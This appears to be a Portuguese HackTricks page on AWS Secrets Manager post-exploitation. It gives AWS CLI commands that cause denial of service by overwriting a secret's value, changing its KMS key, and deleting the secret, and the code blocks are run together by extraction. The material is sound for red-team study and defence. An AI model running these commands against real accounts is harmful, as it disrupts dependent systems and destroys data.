AWS - Secrets Manager Post Exploitation

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Secrets Manager

Para mais informações, verifique:

pageAWS - Secrets Manager Enum

Ler Segredos

Os próprios segredos são informações sensíveis, verifique a página de escalonamento de privilégios para aprender como lê-los.

DoS Alterar Valor do Segredo

Alterando o valor do segredo, você poderia DoS todo o sistema que depende desse valor.

Observe que os valores anteriores também são armazenados, então é fácil voltar ao valor anterior.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### Alteração de DoS na Chave KMS ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Excluindo Segredo

O número mínimo de dias para excluir um segredo é 7.

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Última actualización